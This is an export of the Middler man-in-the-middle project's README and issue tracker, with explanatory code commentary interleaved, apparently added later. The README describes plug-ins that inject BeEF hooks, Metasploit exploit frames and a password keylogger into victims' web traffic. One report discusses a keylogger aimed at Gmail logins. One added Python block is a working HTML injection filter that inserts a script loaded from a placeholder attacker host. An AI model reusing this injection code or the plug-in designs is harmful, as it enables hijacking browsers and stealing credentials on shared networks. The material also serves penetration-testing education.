jaybeale / middler
Automatically exported from code.google.com/p/middler
== Introduction ==

The Middler is a Man in the Middle tool to demonstrate protocol middling attacks. Led by Jay Beale, the project involves a team of authors including InGuardians agents Justin Searle and Matt Carpenter, as well as non-InGuardians Open Sourcers Tim Craig and Brandon Edwards.

The Middler is intended to man in the middle, or "middle," for short, every protocol for which we can create code. In our first alpha release, we released an HTTP proxy built by Matt and Jay, with introductory plug-ins by Justin and InGuardians agent Tom Liston. The HTTP proxy and plug-ins have moved into full production state, with a new protocol, Voice over IP's own SIP, in development.

The Middler runs on Linux and OS X and requires Python 2.6.x.

== Plug-Ins ==

Justin and Tom's first plug-ins were very cool:

* plugin-beef.py - inject the Browser Exploitation Framework (BeEF) into any HTTP requests originating on the local LAN
* plugin-metasploit.py - inject an IFRAME into cleartext (HTTP) requests that loads Metasploit browser exploits
* plugin-keylogger.py - inject a JavaScript onKeyPress event handler into cleartext forms that get submitted via HTTPS, forcing the browser to send the password character-by-character to the attacker's server before the form is submitted.

Justin has refinements to these on the way, as well as a batch of so-far unreleased modules. The author team has done a tremendous amount of research, design and pseudo-code work, fleshing out attacks on web-based e-mail systems and social networking sites. We'll be standing up an external Wiki soon to share more of these ideas, but you can get early details from the slides from Jay and Justin's talks at Def Con.

== Dependencies: ==

The Middler depends on the following Python modules:

* scapy
* libpcap
* readline
* libdnet (libdumbnet on some systems where dnet means DECnet.)
* python-netfilter

Please see the wiki for platform-specific installation instructions.
== People: ==

* Justin Searle - Co-Author
* Matt Carpenter - Co-Author
* Tom Liston - Emeritus Co-author
* Tim Craig - Co-author, fixing HTTP issues
* Brandon Edwards - Co-Author, focus on DHCP Poisoning and Installation/Update
* Rob Fuller / Mubix - Beta Tester
* Matt Burton - Beta Tester
* Lance James - Beta Tester
* Nick DePetrillo - Beta Tester
* Brian Aker / Krow - Beta Tester
* Jay Beale - Co-Author and Project Lead

=== Special Pre-Announcement: ===

Justin Searle offers a Man in the Middle Attacks for Penetration Testers class, where he teaches people how to both use and add onto the Middler and other MitM tools. We're sure you'll find the class very useful.
What steps will reproduce the problem?
1. Starting middler.py as root and user
2.
3.
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
Revision 169
Ubuntu 9.10
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 12 Dec 2009 at 7:13
What steps will reproduce the problem?
1. Have Middler start proxying some traffic
2. Try to kill middler with a ^C
3. If this doesn't work, you have to kill -9 the process
What is the expected output? What do you see instead?
Middler should gracefully die when you pass it a ^C
Please use labels and text to provide additional information.
I suspect it happens when middler still has threads open
Original issue reported on code.google.com by [email protected]
on 4 Jul 2009 at 11:15
I have noticed middler picking up what it believes to be SIP traffic when
in fact there is no SIP traffic.
Middler throws out the following output:
---------START------------------------------------
Started a new thread to handle connection from 192.168.10.2:30788 on port
10000!
Looking at a line that reads
d1:rd2:id20:�S@y&���R��C+ZSO8�n5:nodes208:�SA���!l��>|��p�
���zr�||n����SD�L_Da��
[�����������?��LX�?���S�����r-4ǹTh�qM.���
�F�t�ۭ�S��=�l�z_�j��CGZ�LW���S����0LM���q9�f�ME��
�;�g�S�X^2ޠHR����6k�(�rM[�E��S&����>}��VF=х��tb
��)��e1:t4:�L1:v4:UTH81:y1:re
First line was
d1:rd2:id20:�S@y&���R��C+ZSO8�n5:nodes208:�SA���!l��>|��p�
���zr�||n����SD�L_Da��
��v��[�����������?��LX�?���S�����r-4ǹTh
�qM.��F�t�ۭ�S��=�l�z_�j��CGZ�LW���S����0LM���q9
�f�ME�;�g�S�X^2ޠHR����6k�(�rM[�E��S&����>}��
VF=х��tb��)��e1:t4:�L1:v4:UTH81:y1:re
SIP Method line:
d1:rd2:id20:�S@y&���R��C+ZSO8�n5:nodes208:�SA���!l��>|��p�
���zr�||n����SD�L_Da��
[�����������?��LX�?���S�����r-4ǹTh�qM.���
�F�t�ۭ�S��=�l�z_�j��CGZ�LW���S����0LM���q9�f�ME��
�;�g�S�X^2ޠHR����6k�(�rM[�E��S&����>}��VF=х��tb
��)��e1:t4:�L1:v4:UTH81:y1:re
Modified headers:
d1:rd2:id20:�S@y&���R��C+ZSO8�n5:nodes208:�SA���!l��>|��p�
���zr�||n����SD�L_Da��
[�����������?��LX�?���S�����r-4ǹTh�qM.���
�F�t�ۭ�S��=�l�z_�j��CGZ�LW���S����0LM���q9�f�ME��
�;�g�S�X^2ޠHR����6k�(�rM[�E��S&����>}��VF=х��tb
��)��e1:t4:�L1:v4:UTH81:y1:re
DEBUG: destination URI is
DEBUG: wasn't in our SIP URI -> IP:Port table.
DEBUG: Parsed destination hostname - it was
------Thread from port 10000 out!----
I have done a quick ngrep; here is the output of the traffic it is picking up:
usr@endure:~/tools$ sudo ngrep -q -d wlan0 UTH81:
U 192.168.10.2:30788 -> 95.24.41.190:2048
d1:rd2:id20:.S@y&...R..C+ZSO8.ne1:t4:ly..1:v4:UTH81:y1:re
U 192.168.10.2:30788 -> 95.24.41.190:2048
d1:rd2:id20:.S@y&...R..C+ZSO8.ne1:t4:ly..1:v4:UTH81:y1:re
U 192.168.10.2:30788 -> 74.219.91.121:41092
d1:rd2:id20:.S@y&...R..C+ZSO8.n5:nodes208:.SM.............`-..\...R..SNA5...%>.
y{5G..mW^Z...
...SH.F(..'.J..lua0.wo\(Sp< .S]/
<m#.'..Q..^...._8"#...S\V<[email protected].]]...#.S_./.ODHA3.G
,....s.M1..]*.S_./.ODHA3.G,....s.Q8.*2..S_./.ODHA3.G,....s.|zZ.&s5:token20:....8
.3.p'AO..s8..
.c6:valuesl6:...L..6:CVK...6:Ji...D6:B9.]..6:Q.].E.6:...p..6:T.G.].6:F.....ee1:t
4:....1:v4:UT
H81:y1:re
U 192.168.10.2:30788 -> 74.219.91.121:41092
d1:rd2:id20:.S@y&...R..C+ZSO8.n5:nodes208:.SM.............`-..\...R..SNA5...%>.
y{5G..mW^Z...
...SH.F(..'.J..lua0.wo\(Sp< .S]/
<m#.'..Q..^...._8"#...S\V<[email protected].]]...#.S_./.ODHA3.G
,....s.M1..]*.S_./.ODHA3.G,....s.Q8.*2..S_./.ODHA3.G,....s.|zZ.&s5:token20:....8
.3.p'AO..s8..
.c6:valuesl6:...L..6:CVK...6:Ji...D6:B9.]..6:Q.].E.6:...p..6:T.G.].6:F.....ee1:t
4:....1:v4:UT
H81:y1:re
The host sending this is my partner's Mac.
Middler is running on my Ubuntu laptop.
Original issue reported on code.google.com by Mr.R.Birtles
on 27 Apr 2010 at 2:37
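The payload in this report is not SIP at all: `d1:rd2:id20:...e1:t4:...1:v4:UTH81:y1:re` is a bencoded BitTorrent DHT (KRPC) response (`y` = `r` marks a reply, `nodes208` carries eight 26-byte compact node entries, and `v` is the sending client's version string). Middler's SIP thread took it because the proxy is chosen by UDP port alone and the datagram goes straight to the SIP line parser, which is why the "SIP Method line" and "destination URI" debug lines come out as binary garbage and empty strings. The following is an added example, not Middler's code, of the gate a SIP proxy thread should apply before treating a datagram as SIP: the first line must be printable US-ASCII and match an RFC 3261 request or status line. The sample messages, the upper-case-only method class and the helper names are this example's own assumptions (Python 3):

```python
import re

# RFC 3261 start lines:
#   Request-Line = Method SP Request-URI SP SIP-Version CRLF
#   Status-Line  = SIP-Version SP Status-Code SP Reason-Phrase CRLF
# Assumption: methods are upper-case letters (INVITE, REGISTER, ...). RFC 3261
# allows any token for extension methods, so widen the class if you need them.
_REQUEST_LINE = re.compile(
    rb"^(?P<method>[A-Z]+) (?P<uri>[A-Za-z][A-Za-z0-9+.-]*:[^ ]+) SIP/2\.0$")
_STATUS_LINE = re.compile(
    rb"^SIP/2\.0 (?P<code>[1-6][0-9]{2}) (?P<reason>[ -~]*)$")


def sip_start_line(payload):
    """Classify the first line of a UDP payload.

    Returns ("request", method, uri) or ("status", code, reason) when the
    first line is a well-formed SIP start line, otherwise None.
    """
    end = payload.find(b"\n")
    if end == -1:                      # SIP is line-oriented; no terminator means not SIP
        return None
    line = payload[:end].rstrip(b"\r")
    # The start line is printable US-ASCII; a control or high byte rules it out.
    # This is the check that rejects binary traffic such as the DHT packets above.
    if not line or any(b < 0x20 or b > 0x7E for b in line):
        return None
    m = _REQUEST_LINE.match(line)
    if m:
        return ("request", m.group("method").decode("ascii"), m.group("uri"))
    m = _STATUS_LINE.match(line)
    if m:
        return ("status", int(m.group("code")), m.group("reason").decode("ascii"))
    return None


def looks_like_sip(payload):
    """Gate a SIP proxy thread on this instead of on the UDP port alone."""
    return sip_start_line(payload) is not None


def sip_uri_hostport(uri):
    """(host, port) from a sip:/sips: Request-URI; default ports 5060/5061.

    This is the lookup key a SIP proxy needs for its URI -> IP:Port table.
    """
    scheme, sep, rest = uri.partition(b":")
    scheme = scheme.lower()
    if not sep or scheme not in (b"sip", b"sips"):
        return None
    hostport = rest.split(b"@")[-1]                            # drop user[:password]@
    hostport = hostport.split(b";", 1)[0].split(b"?", 1)[0]    # drop ;params and ?headers
    if hostport.startswith(b"["):                              # IPv6 literal: [2001:db8::1]:5060
        host, _, port = hostport[1:].partition(b"]")
        port = port.lstrip(b":")
    else:
        host, _, port = hostport.partition(b":")
    default = 5061 if scheme == b"sips" else 5060
    return host.decode("ascii"), (int(port) if port else default)


# Constructed samples (not taken from the report): a SIP request, a SIP
# response, and a bencoded DHT reply shaped like the one Middler mis-detected.
SIP_INVITE = (b"INVITE sip:bob@example.invalid SIP/2.0\r\n"
              b"Via: SIP/2.0/UDP 192.0.2.1:5060;branch=z9hG4bK776asdhds\r\n\r\n")
SIP_OK = b"SIP/2.0 200 OK\r\nVia: SIP/2.0/UDP 192.0.2.1:5060\r\n\r\n"
DHT_RESPONSE = b"d1:rd2:id20:" + bytes(range(20)) + b"e1:t4:abcd1:v4:UTH81:y1:re"

if __name__ == "__main__":
    for name, sample in (("INVITE", SIP_INVITE), ("200 OK", SIP_OK), ("DHT", DHT_RESPONSE)):
        print(name, "->", sip_start_line(sample))
```

The printable-ASCII test does most of the work: a 20-byte node ID or a compact node list almost always contains a control byte, so the datagram is rejected before any regex runs, and a thread is never spawned for it.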
What steps will reproduce the problem?
1. Start tcpdump on Middler machine
2. Start proxying traffic with Middler
3. Analyze delay between Middler receiving traffic from Inet and sending a
proxied copy to the victim
What is the expected output? What do you see instead?
Middler should send traffic as soon as it receives it
Please use labels and text to provide additional information.
Original issue reported on code.google.com by [email protected]
on 4 Jul 2009 at 11:23
What steps will reproduce the problem?
1. setup.py build
2.
3.
What is the expected output? What do you see instead?
error: package directory 'middlerlib' does not exist
What version of the product are you using? On what operating system?
kali linux
backtrack5r3
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 2 Jul 2013 at 10:18
What steps will reproduce the problem?
1. Start an arpspoof
2. Start Middler
3. go to gmail.com and do a login
What is the expected output? What do you see instead?
My javascript should be injected into the response
What version of the product are you using? On what operating system?
The last revision
Please provide any additional information below.
I've written a JavaScript based keylogger plugin for Middler (based on your
original keylogger plugin)
It works on most of sites, but in sites that have an initial HTTPS
connection, it fails (It seems that gmail.com returns a "302 Moved
Temporarily" and then redirects to the gmail's main page)
Is there any work on keylogger plugin ?
Should I know something specific about injecting code to sites such as gmail ?
Original issue reported on code.google.com by mehdideveloper
on 2 Aug 2009 at 9:24
Attachments:
What steps will reproduce the problem?
1.
2.
3.
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
ubuntu 9.04
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 24 Jul 2009 at 6:15
What steps will reproduce the problem?
1. Checkout latest SVN, run middler
2. Use IE 8
3. Visit Google
What is the expected output? What do you see instead?
I expect to see google, instead I see "you cannot connect"
What version of the product are you using? On what operating system?
IE8 on XPsp3 and Win7
Please provide any additional information below.
There are 2 problems:
1) in http_proxy a pop occurs when gzip is encountered without resetting the
index, thereby dropping one other element in the header
2) Google seems to be assuming I can handle the gzip data, and passing it
along even though there isn't an encoding method specified in the request
The attached patch fixed it for me.
Thanks,
Ryan
Original issue reported on code.google.com by [email protected]
on 31 Mar 2010 at 6:25
Attachments:
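The plug-ins listed in the README (BeEF hook, Metasploit IFRAME, keylogger) all work by rewriting an HTML response in transit, and two reports on this page show exactly where that breaks: a server that compresses the body even though the request never advertised gzip (this report), and a "302 Moved Temporarily" to an https:// Location (the Gmail keylogger report above), which carries no document and moves the rest of the session onto TLS where a cleartext proxy never sees the login page. The following is an added example, not Middler's http_proxy code or any of its plug-ins, of a response filter written in Python 3 that handles both: it removes Accept-Encoding from the request by building a filtered list rather than popping inside a loop (the index-skipping bug in point 1), unchunks and gunzips a body before injecting, rewrites Content-Length, and passes redirects, non-HTML and unknown encodings through untouched. The hook URL and the sample request and responses are this example's own constructions:

```python
import gzip
import re

# Placeholder hook location for this example (assumption): a real plug-in would
# point it at the attacker's BeEF or keylogger server.
SCRIPT_TAG = b'<script src="http://hook.example.invalid/hook.js"></script>'


def strip_accept_encoding(request):
    """Drop Accept-Encoding from a raw HTTP request so the origin answers with an
    uncompressed body the plug-in can read and modify.

    The header lines are filtered into a new list instead of being popped while
    iterating: popping shifts the remaining indices and silently skips the
    element right after the removed one.
    """
    head, sep, body = request.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    kept = [lines[0]] + [h for h in lines[1:]
                         if not h.lower().startswith(b"accept-encoding:")]
    return b"\r\n".join(kept) + sep + body


def parse_response(raw):
    """Split a raw HTTP response into (status line, [(name, value), ...], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def header(headers, name):
    """First value of a header, matched case-insensitively, or None."""
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def dechunk(body):
    """Reassemble a Transfer-Encoding: chunked body (trailers are ignored)."""
    out, pos = b"", 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)   # chunk-size[;extensions]
        if size == 0:
            return out
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                        # skip the data and its CRLF


def inject(raw_response, payload=SCRIPT_TAG):
    """Return the response with `payload` inserted before </body> when, and only
    when, it is a 200 text/html document; anything else passes through as-is."""
    status, headers, body = parse_response(raw_response)
    try:
        code = int(status.split()[1])
    except (IndexError, ValueError):
        return raw_response
    ctype = (header(headers, b"Content-Type") or b"").lower()
    # A 3xx (Gmail's "302 Moved Temporarily" to an https:// Location) has no
    # document to carry the script; after the browser follows it the session is
    # TLS end to end and never passes through a cleartext proxy again.
    if code != 200 or not ctype.startswith(b"text/html"):
        return raw_response
    te = (header(headers, b"Transfer-Encoding") or b"").lower()
    if te == b"chunked":
        body = dechunk(body)
    elif te:
        return raw_response                             # unknown framing: do not corrupt it
    enc = (header(headers, b"Content-Encoding") or b"").lower()
    if enc == b"gzip":
        body = gzip.decompress(body)                    # server compressed anyway (the IE8 report)
    elif enc not in (b"", b"identity"):
        return raw_response                             # deflate, br, ...: pass through
    idx = len(body)                                     # insert before </body>, else </html>, else append
    for tag in (b"</body>", b"</html>"):
        m = re.search(re.escape(tag), body, re.IGNORECASE)
        if m:
            idx = m.start()
            break
    body = body[:idx] + payload + body[idx:]
    # The body is now identity-encoded and fully buffered, so reframe it.
    kept = [(n, v) for n, v in headers
            if n.lower() not in (b"content-encoding", b"content-length", b"transfer-encoding")]
    kept.append((b"Content-Length", str(len(body)).encode("ascii")))
    head = b"\r\n".join([status] + [n + b": " + v for n, v in kept])
    return head + b"\r\n\r\n" + body


def sample_gzip_response():
    """Constructed sample: a gzip-compressed HTML page, as a server might send
    even when the request carried no Accept-Encoding."""
    html = b"<html><head><title>t</title></head><body><p>hi</p></body></html>"
    gz = gzip.compress(html)
    head = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n"
            b"Content-Encoding: gzip\r\nContent-Length: %d\r\n\r\n" % len(gz))
    return head + gz
```

Stripping Accept-Encoding on the way out and still decoding gzip on the way back are both needed: the first makes most servers send identity bodies, the second covers the ones that compress regardless, which is what point 2 of the report describes.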
For the arp spoofing flag, could this be extended from just on and off to
use targets, and possibly files. (i.e.
-A (Choose an option, default is 1 - or full ON)
0 OFF, no arp spoofing will be conducted.
1 ON, arp spoofing will happen against the gateway
2 <target> arp spoofing will happen against the specified target
3 <file> targeted arp spoofing will happen against each of the line
separated list of hosts from a file.
Thanks,
mubix
Original issue reported on code.google.com by [email protected]
on 27 Jul 2009 at 3:21
./middler.py
WARNING: No route found for IPv6 destination :: (no default route?)
==================================
The Middler - HTTP and SIP Edition
==================================
Redirecting udp port 5060 to The Middler's proxy on localhost:5060
Redirecting udp port 5061 to The Middler's proxy on localhost:5061
Redirecting udp port 10000 to The Middler's proxy on localhost:10000
Redirecting udp port 64064 to The Middler's proxy on localhost:64064
Redirecting tcp port 80 to The Middler's proxy on localhost:80
Traceback (most recent call last):
File "./middler.py", line 140, in <module>
server = libmiddler.proxies.http.http_proxy.ThreadedTCPServer((ml.hostname,ml.port), libmiddler.proxies.http.http_proxy.Middler_HTTP_Proxy)
File "/usr/lib/python2.6/SocketServer.py", line 400, in __init__
self.server_bind()
File "/usr/lib/python2.6/SocketServer.py", line 411, in server_bind
self.socket.bind(self.server_address)
File "<string>", line 1, in bind
socket.error: [Errno 98] Address already in use
Original issue reported on code.google.com by [email protected]
on 20 May 2013 at 8:41
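Errno 98 (EADDRINUSE) on the bind means something still holds TCP port 80 on the box when Middler starts: typically an earlier Middler instance that did not die on Ctrl-C (the report above where only kill -9 works), another proxy or web server, or the previous instance's relayed connections lingering in TIME_WAIT. The following is an added example, not Middler's code, showing the two settings Python's SocketServer (2.x) / socketserver (3.x) offers for this, `allow_reuse_address` (SO_REUSEADDR set before bind) and `daemon_threads` (handler threads cannot keep the process alive after Ctrl-C), together with a pre-bind probe that reports the errno name instead of a traceback and a shutdown path that stops the accept loop and releases the socket. The class name, the echo handler standing in for the HTTP proxy handler, and port 8080 standing in for port 80 are this example's own assumptions (Python 3):

```python
import errno
import socket
import socketserver
import threading


class ProxyServer(socketserver.ThreadingTCPServer):
    """Threaded TCP server with the two settings the reports above call for.
    (This class and its handler are the example's stand-ins, not Middler's.)"""
    # SO_REUSEADDR: a restarted proxy can rebind its port while the previous
    # instance's relayed connections sit in TIME_WAIT. It does NOT help when
    # another process, or a stuck earlier instance, is still listening.
    allow_reuse_address = True
    # Handler threads are daemons, so a thread still relaying a long-lived
    # connection cannot keep the process alive after Ctrl-C.
    daemon_threads = True


class EchoHandler(socketserver.StreamRequestHandler):
    """Stand-in for the HTTP proxy handler: echoes one line back."""
    def handle(self):
        self.wfile.write(self.rfile.readline())


def port_conflict(host, port):
    """None if a server with allow_reuse_address could bind (host, port),
    otherwise the errno name ("EADDRINUSE" when something still listens there)."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        probe.bind((host, port))
        return None
    except OSError as exc:
        return errno.errorcode.get(exc.errno, str(exc.errno))
    finally:
        probe.close()


def serve(host, port):
    """Bind, then run the accept loop in a background thread; returns (server, thread).
    Port 0 asks the kernel for any free port; read server.server_address for it."""
    server = ProxyServer((host, port), EchoHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return server, thread


def stop(server, thread):
    """Graceful shutdown: stop the accept loop, release the listening socket and
    wait for the loop thread. Returns True once the thread has exited."""
    server.shutdown()
    server.server_close()
    thread.join(timeout=5)
    return not thread.is_alive()


def client_roundtrip(host, port, line=b"ping\n"):
    """Connect once, send a line and return what the handler sends back."""
    with socket.create_connection((host, port), timeout=5) as client:
        client.sendall(line)
        return client.recv(1024)


if __name__ == "__main__":
    HOST, PORT = "127.0.0.1", 8080              # assumption: 8080 stands in for port 80
    err = port_conflict(HOST, PORT)
    if err is not None:
        raise SystemExit("cannot bind %s:%d: %s" % (HOST, PORT, err))
    server, thread = serve(HOST, PORT)
    print("listening on %s:%d, Ctrl-C to stop" % server.server_address)
    try:
        while thread.is_alive():
            thread.join(1.0)                    # Ctrl-C raises KeyboardInterrupt here
    except KeyboardInterrupt:
        print("stopped cleanly:", stop(server, thread))
```

Running the script twice at once shows both halves: the second copy exits with "cannot bind 127.0.0.1:8080: EADDRINUSE" instead of the traceback above, and Ctrl-C in the first returns promptly because the serve loop is told to stop and no non-daemon handler thread is left to wait on.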